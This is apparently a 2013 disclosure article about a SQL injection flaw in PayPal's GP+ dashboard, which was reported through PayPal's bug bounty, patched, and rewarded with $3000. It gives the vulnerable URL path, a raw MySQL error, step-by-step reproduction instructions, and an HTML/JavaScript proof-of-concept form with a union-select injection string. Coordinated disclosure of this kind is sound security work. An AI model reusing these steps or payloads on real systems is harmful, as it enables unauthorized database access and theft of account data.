PayPal Inc pays 3000$ reward to Laboratory Researcher

PayPal Inc pays 3000$ reward to Laboratory Researcher

Some month ago the vulnerability laboratory research team disclosed a critical vulnerability to the paypal site security team. The issue was tracked as 52th bug bounty submission by the laboratory core team. The author of the issue is Benjamin Kunz Mejri the owner and founder of the research company. The advisory document uncovered a remote sql injection vulnerability with critical severity in the official PayPal GP+ company service web application.

"The vulnerability was located in the analysis all review module with the bound vulnerable page id parameter listing. The application allows to switch the page after 10 running or done analysis. When a customer is processing to request the link to for example page 7 the server will include the integer value not encoded or parsed to the url path. Attackers can exchange the integer page with own sql statements to compromise the application dbms and all paypal accounts." "The secound problem is the server is bound to the main site auth which allows after a sql and dbms compromise via inject to exploit the bound paypal inc services. Attackers can access all database tables and columns to steal the gp+ database content and disclose information, deface the website phish account or extract database password/username information," the security researcher explained.

Vulnerable Section(s):

[+] Analysis (https://www.paypal-gpplus.com/en/dashboard/)

Vulnerable Module(s):

[+] All - Listing (https://www.paypal-gpplus.com/en/dashboard/all/)

Vulnerable Parameter(s):

[+] page id

Successful exploitation & User interaction The vulnerability can be exploited without user inter action but with low privileged application user account to visit the restricted webpage with a not expired session. Successful exploitation of the vulnerability results in web application context manipulation via dbms injection, website defacement, hijack of database accounts via dbms extract, information disclosure of database content, data lost or full dbms compromise.

Standard URL: Page ID - Existing https://www.paypal-gpplus.com/en/dashboard/all/2/

Provoke Error URL: Page ID - Not Exisiting https://www.paypal-gpplus.com|x/en/dashboard/all/9999999999999999999999999999999999999999999999999999999/ ---

SQL Error Exception --- Query error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.4563604257983E+19, 7' at line 5 - SELECT SQL_CALC_FOUND_ROWS * FROM scans WHERE userid='14619' ORDER BY date DESC, time DESC LIMIT 6.4563604257983E+19, 7 Error while running querie; You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '6.4563604257983E+19, 7' at line 5

Manually steps & Reproduce 0. Register a paypal account and link it to an official banking account 1. Register an account for paypal GP+ 2. Login to the account and click in the dashboard the scan new button 3. Include 10 new urls and let the gp+ system analyse it 4. Go to the dashboard and open the all analysis section 5. Scroll down and now the page letter to switch will be visible 6. Open the link to /dashboard/all/2/ 7. Exchange the integer page id path /2/ with for example /9999999999999999 to provoke an error via not existing webpage 8. The sql error pops up on the top of the application 9. Now, the attacker can easily exchange the 999999999 integer path id context with own mysql commands to request database details & columns 10. Successful reproduced ...!

Proof of Concept - Exploit <html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9"> <title>PAYPAL GP+ => [ANALYSIS ALL] Remote SQL-Injection Vulnerability </title> <script language="JavaScript"> var path="/en/dashboard/" var list="all/" var service ="https://www.paypal-gpplus.com" var sql = "-99999999'union select 1,2,3,4.../*--/" # Exchange with your own statement to inject function command(){ if (document.rfi.target1.value==""){ alert("Failed.."); return false; } rfi.action= document.rfi.target1.value+path+list+service+sql; rfi.submit(); } //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // PAYPAL GP+ => [ANALYSiS ALL] - Remote SQL Injection Vulnerability (POC) //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= // VULNERABILITY RESEARCH LABORATORY // [c]oded by ~BENJAMIN KUNZ MEJRI //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-</script></head><body bgcolor="#000000" link="#990000"> <center> <p align="center"><b><font face="Verdana" size="2" color="#006633">PAYPAL GP+ </font><font face="Verdana" size="2" color="#006633"> => [ANALYSIS ALL] Remote SQL-Injection Vulnerability </font> </b></p> <form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left"> <p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b> <input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p> <p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080"> HTTP://VULNERABILITY-LAB.COM/[SCRIPT- PATH]/</font></b></p> </div> <p align="left"><input type="submit" value="Execute INPUT" name="B1"> </p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p><div align="left"> <p align="center"><b><font face="Verdana" size="2" color="#CC3333">VULNERABILITY LABORATORY</font></b></p> <p align="center"><b><font face="Verdana" size="2" color="#008000"><a href="mailto:bkm@vulnerability-lab.com">~bkm</a></font></b></p> </div></center></body></html>

Report Time-Line The vulnerability has been reported in January 2013 to the paypal bug bounty program and the fix has been provided within 1 month. The sql injection was exploited manually by the researcher and the issue was reported to paypal at the same day. The reaction of paypal inc was not slow navigated and the fix good coordinated by the site security team.

2013-01-04:     Researcher Notification & Coordination
2013-01-04:     Vendor Notification
2013-01-11:     Vendor Response/Feedback
2013-02-01:     Vendor Fix/Patch
2013-04-03:     Public Disclosure

Reward 3000$ - Bug Bounty

After the vulnerability has been patched with coordinated disclosure by the paypal site security team the researcher received a reward of 3000$ for reporting the vulnerability to paypal. "Some people said to me the money amount of 3000$ was to low for this kind of issue and we should force to get more of paypal. We do not think so. We work cooperative to paypal as official partners of the program and do not want to force any vendor in this kind of way. We accepted the decision of paypal without discussions because since yet our cooperation and partnership was ever fair coordinated without exceptions, Benjamin Kunz Mejri explained in a short text interview.

Advisory: http://www.vulnerability-lab.com/get_content.php?id=822

PayPal Security UID: qcm1fe0emw

Press: http://www.theregister.co.uk/2013/04/15/paypal_sql_injection/